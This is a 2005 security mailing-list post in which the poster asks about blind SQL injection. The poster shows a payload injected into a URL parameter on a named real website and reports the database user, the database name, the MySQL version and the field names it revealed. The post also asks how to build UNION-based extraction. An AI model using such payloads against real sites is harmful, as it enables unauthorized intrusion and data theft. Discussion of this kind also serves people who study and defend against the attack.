Full Disclosure mailing list archives
courious blind sql topic..
From: "none neither" <stfu () consultant com>
Date: Mon, 01 Aug 2005 06:49:31 -0500
I was just learning about sql injection and it's blind recall, and I have some questions: With the sentence " and MID($$$FIELD$$$,1,1) like CHAR(37) " and some bruteforce I went through php's special chars protection and was able to get thinks like: http://www.phrack.org/author.php?a=290 and MID($$$FIELD$$$,1,1) like CHAR(37) user() of query: phracksql@localhost database() fo query: phrack version of mysql: 4.0.18... I was also able to get the names of the field in the query using the following sentence: http://www.phrack.org/author.php?a=290 and MID($$$FIELD$$$,1,1) like CHAR(37) and I've found these in my example: - id, date, name, title but when the field is empty (for example: ?a=300 and MID(email,1,1) like CHAR(37) author 300 has no email in database ) I get no clear response as with a=290.. Is there a better select to get a field even if it's empty? I've tried to find the number of fields or the name of the table in the database, but alltough it's mysql4.x I was not able to build a workingn union yet.. I'll work in it. Thanks in advance.. stfu -- ___________________________________________________________ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- courious blind sql topic.. none neither (Aug 01)